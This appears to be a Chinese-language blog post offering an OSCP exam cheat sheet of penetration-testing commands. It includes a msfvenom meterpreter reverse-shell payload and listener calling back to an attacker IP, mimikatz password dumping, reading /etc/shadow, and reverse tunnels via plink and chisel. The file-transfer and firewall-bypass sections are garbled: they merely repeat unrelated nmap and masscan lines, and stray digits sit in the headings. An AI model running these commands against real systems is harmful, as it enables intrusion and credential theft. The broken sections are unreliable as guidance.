📌 前言
作为渗透测试领域的"黄金证书",OSCP考试以实战性强著称。掌握高效的命令行操作是考试通关的关键!本文整理7大类高频命令,配合实战截图演示,助你快速构建肌肉记忆!
后台回复OSCP领取116页OSCP命令操作手册
🕵️ 一、信息收集篇
1. 主机探测
nmap -sn 192.168.1.0/24 # 快速存活主机扫描
arp-scan -l # ARP层扫描(绕过防火墙)
(图2:Nmap主机发现扫描结果)
2. 端口扫描
nmap -sC -sV -p- 192.168.1.1 # 全端口扫描+版本探测+默认脚本
masscan -p1-65535 192.168.1.1 --rate=1000 # 高速端口扫描
3. 目录爆破
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirb http://target.com /usr/share/wordlists/dirb/common.txt
💣 二、漏洞利用篇
1. 生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe > shell.exe
(图3:MSFvenom生成payload演示)
2. 开启监听
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 443; run"
3. SMB漏洞利用
impacket-smbserver share ./smb_share # 快速搭建SMB共享
👑 三、权限提升篇
Linux提权
find / -perm -u=s -type f 2>/dev/null # 查找SUID文件
sudo -l # 查看sudo权限
Windows提权
whoami /priv # 查看特权
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 系统信息
(图4:Windows系统信息收集示例)
🕳️ 四、后渗透阶段
1. 密码转储
mimikatz.exe "privilege::debug""sekurlsa::logonpasswords"# Windows密码提取
cat /etc/shadow # Linux密码文件
2. 隧道穿透
plink -ssh -l user -pw pass -R 445:127.0.0.1:445 10.10.14.5 # 端口转发
chisel client 10.10.14.5:8080 R:socks # Socks代理
📦 五、文件传输技巧
Linux到Windows
nmap -sC -sV -p- 192.168.1.1 # 全端口扫描+版本探测+默认脚本
masscan -p1-65535 192.168.1.1 --rate=1000 # 高速端口扫描
0Windows到Linux
nmap -sC -sV -p- 192.168.1.1 # 全端口扫描+版本探测+默认脚本
masscan -p1-65535 192.168.1.1 --rate=1000 # 高速端口扫描
1🛡️ 六、防御绕过技巧
防火墙绕过
nmap -sC -sV -p- 192.168.1.1 # 全端口扫描+版本探测+默认脚本
masscan -p1-65535 192.168.1.1 --rate=1000 # 高速端口扫描
2🧠 七、考试小贴士
记录为王:全程使用KeepNote/DokuWiki记录每条命令 时间管理:划分扫描时间(建议nmap使用 --max-retries 1 --min-rate 500加速)靶机快照:每次重大操作前保存虚拟机状态。
🔚 结语
OSCP考试是体力与技术的双重挑战,掌握这些命令相当于拥有了"渗透瑞士军刀"。记住:实战练习 > 死记硬背,建议在HTB/VulnHub平台反复演练!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...